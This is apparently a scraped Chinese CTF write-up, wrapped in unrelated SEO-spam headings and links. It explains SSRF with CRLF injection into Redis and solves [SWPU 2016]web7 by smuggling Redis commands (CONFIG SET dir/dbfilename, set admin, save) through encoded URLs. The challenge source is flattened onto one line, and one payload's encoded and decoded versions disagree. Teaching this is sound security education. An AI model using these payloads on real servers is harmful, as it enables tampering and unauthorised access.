当前位置: 首页 > news >正文

惠州百度推广排名seo需要培训才能找到工作吗

news 2025/7/3 23:30:45
惠州百度推广排名,seo需要培训才能找到工作吗,店面装修,长沙网络公司营销方案文章目录 注入原理例题 [SWPU 2016]web7 注入原理 参考文章 应用场景是具有SSRF漏洞,结合CRLF注入 我们以redis数据库为例,当存在SSRF时我们伪造以下请求 http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%…

文章目录

    • 注入原理
    • 例题 [SWPU 2016]web7

注入原理

参考文章

应用场景是具有SSRF漏洞,结合CRLF注入
我们以redis数据库为例,当存在SSRF时我们伪造以下请求

http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0a:6379/foo

解码一下,执行过程就是将修改Redis的工作目录为 /tmp,然后修改Redis的数据库文件名为 evil,路径为默认端口的/foo

http://127.0.0.1
CONFIG SET dir /tmp
CONFIG SET dbfilename evil
:6379/foo

然后就可以执行相关操作,比如修改用户的密码
再次利用ssrf漏洞进行修改并保存

http://127.0.0.1%0d%0aset%20admin%20admin%0d%0asave%0d%0a:6379/foo

解码结果如下

http://127.0.0.1
set admin 123456
save
:6379/foo

例题 [SWPU 2016]web7

源码

#!/usr/bin/python 
# coding:utf8__author__ = 'niexinming'import cherrypy
import urllib2
import redisclass web7:@cherrypy.exposedef index(self):return "<script> window.location.href='/input';</script>"@cherrypy.exposedef input(self,url="",submit=""):file=open("index.html","r").read()reheaders=""if cherrypy.request.method=="GET":reheaders=""else:url=cherrypy.request.params["url"]submit=cherrypy.request.params["submit"]try:for x in urllib2.urlopen(url).info().headers:reheaders=reheaders+x+"<br>"except Exception,e:reheaders="错误"+str(e)for x in urllib2.urlopen(url).info().headers:reheaders=reheaders+x+"<br>"file=file.replace("<?response?>",reheaders)return file@cherrypy.exposedef login(self,password="",submit=""):pool = redis.ConnectionPool(host='127.0.0.1', port=6379)r = redis.Redis(connection_pool=pool)re=""file=open("login.html","r").read()if cherrypy.request.method=="GET":re=""else:password=cherrypy.request.params["password"]submit=cherrypy.request.params["submit"]if r.get("admin")==password:re=open("flag",'r').readline()else:re="Can't find admin:"+password+",fast fast fast....."file=file.replace("<?response?>",re)return file
cherrypy.config.update({'server.socket_host': '0.0.0.0','server.socket_port': 8080,})
cherrypy.quickstart(web7(),'/')

可以看到引入urllib2模块,题目逻辑比较清晰,就是要登录admin才能获取flag,admin的密码就在redis数据库中,然后input中使用了urllib2.open().info().headers应该是可以利用SSRF来注入redis修改admin的密码的。

我们直接修改密码(redis默认端口为6379)

http://127.0.0.1%0d%0aset%20admin%20123456%0d%0a:6379//解码如下
http://127.0.0.1
set admin 123456
:6379

在这里插入图片描述

http://www.tj-hxxt.cn/news/767.html

相关文章:

  • 基于php的网站开发设计抖音营销
  • 阿里虚拟主机怎么做两个网站网站制作公司怎么找
  • 网站建设公司图片网站优化技术
  • 购物网站怎么做代码国家税务总局网
  • 济南网站建设平台官网网络营销推广工具有哪些?
  • 做视频的网站那几个盈利了北京百度推广排名优化
  • 做的好的个人网站知乎广告软文范例大全100
  • 西安便宜做网站长沙seo关键词排名
  • 网络服务大厅百度sem优化师
  • 域名指向另一个网站网站优化系统
  • 扬州市邗江区城乡建设局网站广告接单平台app
  • 天元建设集团有限公司恒大seo的中文名是什么
  • 新网站建设方案指数基金怎么买
  • 政务公开和网站建设百度电脑版官网下载
  • 家用电脑如何做网站服务器网站流量宝
  • 珠海免费建站百度搜索seo
  • 大连建设工业产品网站谷歌怎么投放广告
  • 烟台做网站的企业西安市seo排名按天优化
  • 网站建设公司找上海站霸手机上可以创建网站吗
  • 有做财经 直播的网站吗seo值是什么意思
  • 专业工厂网站建设化工seo顾问
  • wordpress标签搜索引擎合肥网站优化
  • 网站建设中毒怎么办seo首页关键词优化
  • 广州做家教的网站宁波seo快速优化课程
  • 哪些网站是做数据分析的市场调研问卷调查怎么做
  • 金乡县住房与城乡建设局网站会计培训机构
  • 商机互联做的网站和推广怎么样网络营销是做什么的
  • 潍坊网站建设 管雷鸣百度竞价推广方案
  • wordpress 剑侠情缘主题百度快照优化
  • 跨境电商网站系统开发谷歌sem